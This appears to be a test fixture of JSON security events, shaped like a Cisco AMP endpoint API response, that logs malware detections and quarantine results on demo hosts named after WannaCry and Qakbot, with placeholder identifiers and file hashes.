+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":831000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":706000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":643000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":721000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":214000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":779000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":763000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":718000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":765000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":749000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":702000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336648","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6412622782676336645","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} 